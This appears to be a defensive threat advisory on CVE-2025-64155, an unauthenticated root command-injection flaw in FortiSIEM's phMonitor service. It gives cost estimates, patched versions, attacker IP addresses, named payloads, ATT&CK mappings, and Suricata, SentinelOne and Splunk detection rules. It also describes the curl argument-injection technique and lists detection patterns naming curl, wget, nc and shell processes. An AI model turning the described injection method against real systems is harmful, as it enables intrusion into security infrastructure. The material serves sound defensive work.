BLUF

 An attacker can execute arbitrary commands with root privileges by sending a specially crafted TCP request to the phMonitor service on port 7900. No authentication is required for exploitation. The flaw exists in the elastic_test_url.sh script due to improper neutralization of user input.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by unauthenticated remote command execution against Fortinet FortSIEM (CVE-2025-64155):

·       Low-end total cost: $800K – $1.3M

o   (Rapid patching, no lateral movement, limited log integrity concerns)

·       Typical expected range: $1.5M – $2.8M

o   (Short dwell time, SIEM rebuild required, expanded enterprise threat hunt)

·       Upper-bound realistic scenarios: $3.0M – $5.0M

o   (Delayed detection, regulatory scrutiny, SIEM-enabled lateral access validated)

Key Cost Drivers

·       Duration of attacker access before containment

·       Extent of SIEM log integrity loss and revalidation scope

·       Regulatory obligations tied to monitoring and audit controls

·       Dependence on FortiSIEM for customer or compliance reporting

·       Cyber insurance exclusions related to control-plane compromise

Targeted Sectors

Managed Security Service Providers (MSSPs), Government, Finance, Healthcare, and Telecommunications.

Countries

·       Global

Date of First Reported Activity

·       January 13, 2026

Date of Last Reported Activity Update

·       January 17, 2026

Suspected APT groups

·       China-Nexus Actors

Suspected associated Criminal Organizations

·       Black Basta (Cluster)

·       Initial Access Brokers (IABs)

CVE-2025-64155

CVSS 3.1 Vector

·       (9.8) AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0

·       (9.4) AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Nessus ID

·       214151

Is CVE-2025-64155 on the KEV list

·       Not at this time

What is the patch by date for CVE-2025-64155

·       Not applicable at this time

Patching

Fixed Versions

·       FortiSIEM 7.4.1

·       FortiSIEM 7.3.5

·       FortiSIEM 7.2.3

·       FortiSIEM 7.1.9

·       FortiSIEM 7.0.5

·       FortiSIEM 6.7.11

Official Patch Link

·       hxxps://www.fortiguard.com/psirt/FG-IR-25-772

Malware Names

redishb.sh (Persistence/Downloader)

forti_shell.py (Reverse Shell)

Malware Samples

·       Not applicable

Tools

·       Curl

·       Wget

·       Nc

·       Gobuster

·       masscan

IOCs

As a reminder the heuristic behavior of the attacks should be what is hunted on. hashes, domains, etc. tend to be dynamic and will usually be different for each target, attack and can be different within the same attack

Network Indicators

Threat actors have been observed using various global infrastructures to deliver payloads, perform scanning, and attempt reverse shells.

·       38.180.81.238

o   Observed delivering the redishb.sh payload (US/Chicago).

·       154.192.222.43

o   Highly active; associated with data exfiltration, gobuster scanning, and Nmap probes (Pakistan).

·       146.70.201.245

o   Used for advanced RCE and reverse shell attempts (Japan).

·       103.224.84.76

o   Payload delivery of redishb.sh (Thailand).

·       156.146.55.227

o   HTTP exfiltration testing to postb.in (Bulgaria).

·       120.231.127.227 & 220.181.41.80

o   China-based IPs conducting timing tests (e.g., sleep 3) to verify vulnerability.

·       167.17.179.109 & 209.126.11.25

o   Payload delivery of redishb.sh (Baxet Group and Contabo infrastructure).

Host-Based & Behavioral Indicators

Malicious Files

·       redishb.sh: A shell script frequently used as a primary stage payload.

Suspicious Log Entries

·       Check files in /opt/phoenix/log/phoenix for suspicious PHL_ERROR entries.

·       Look for logs containing external attacker URLs or unusual file paths.

Network Traffic Patterns

·       Unexpected inbound traffic on TCP port 7900

·       Outbound connections from the FortiSIEM appliance using tools like curl or wget to fetch remote scripts.

·       Reverse shell activity originating from the appliance reaching back to external IP addresses

TTPs

Initial Access & Execution

·       T1190 Exploit Public-Facing Application

o   Attackers exploit the unauthenticated API endpoint on TCP port 7900.

·       T1059.004 Command and Scripting Interpreter Unix Shell

o   The vulnerability allows for direct OS command injection to execute arbitrary shell commands.

·       T1203 Exploitation for Client Execution

o   Used in some classifications to describe the execution of unauthorized code via crafted requests.

Persistence & Privilege Escalation

·       T1068 Exploitation for Privilege Escalation

o   Attackers use the initial command injection to escalate from the admin user context to root access.

·       T1543.003 Create or Modify System Process

o   Windows Service (Unix equivalent: T1543.002): Observed tactics include writing malicious files to disk or modifying system binaries to maintain access.

·       T1053.003 Scheduled Task/Job

o   Cron: Attackers have been observed modifying cron jobs to ensure persistence on the compromised system.

Defense Evasion & Lateral Movement

·       T1070 Indicator Removal on Host

o   Observed attempts to cover tracks by removing indicators of compromise and modifying system logs.

·       T1210 Exploitation of Remote Services

o   Once initial access is gained, the compromise of a SIEM allows attackers to pivot and move laterally within the network.

·       T1557 Adversary-in-the-Middle

o   By controlling the SIEM, attackers can read and alter logs or disable security detections.

Suggested rules / potential hunts

Suricata

Detects the initial XML payload containing the elastic storage type and potential argument injection characters (e.g., -o, -F).

alert tcp any any -> any 7900 (msg:"ET EXPLOIT FortiSIEM phMonitor RCE Attempt (CVE-2025-64155)"; flow:established,to_server; content:"<storageType>elastic</storageType>"; nocase; content:"-o"; distance:0; reference:cve,2025-64155; classtype:attempted-admin; sid:1000001; rev:1;)

Detect Outbound Curl Artifacts

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Suspicious Curl Outbound from FortiSIEM (Possible CVE-2025-64155)"; flow:established,to_server; content:"User-Agent|3a| curl/"; nocase; reference:cve,2025-64155; sid:1000002; rev:1;)

SentinelOne

Identify Malicious phMonitor Child Processes

ProcessName = "phMonitor" AND ChildProcessName IN ("sh", "bash", "curl", "nc")

Detect Cron Job Persistence

The exploit often waits for a cron job to execute the payload.

ProcessName = "crond" AND Commandline Contains Any ("/tmp/", "curl", "wget")

File Overwrite Detection

Look for arbitrary file writes by the admin user as part of the privilege escalation chain.

UserName = "admin" AND EventType = "File Modification" AND FilePath In ("/etc/cron.d/", "/var/spool/cron/")

Splunk

Detect phMonitor Service Port Activity

Identify unusual external IP addresses connecting to the phMonitor port.

index=network sourcetype=suricata dest_port=7900 | stats count by src_ip, dest_ip

Monitor Shell Activity in /tmp

Common payloads for this CVE involve writing to /tmp.

index=os sourcetype=bash_history command="*/tmp/*" | table _time, host, user, command

Argument Injection Patterns

Search for logs containing XML payloads with injected curl arguments.

index=web_logs "storageType>elastic" AND ("-o " OR "--output" OR "-F ")

References

Arctic Wolf

·       hxxps://arcticwolf.com/resources/blog/cve-2025-64155/

Tenable

·       hxxps://www.tenable.com/cve/CVE-2025-64155/plugins

NVD

·       hxxps://nvd.nist.gov/vuln/detail/CVE-2025-64155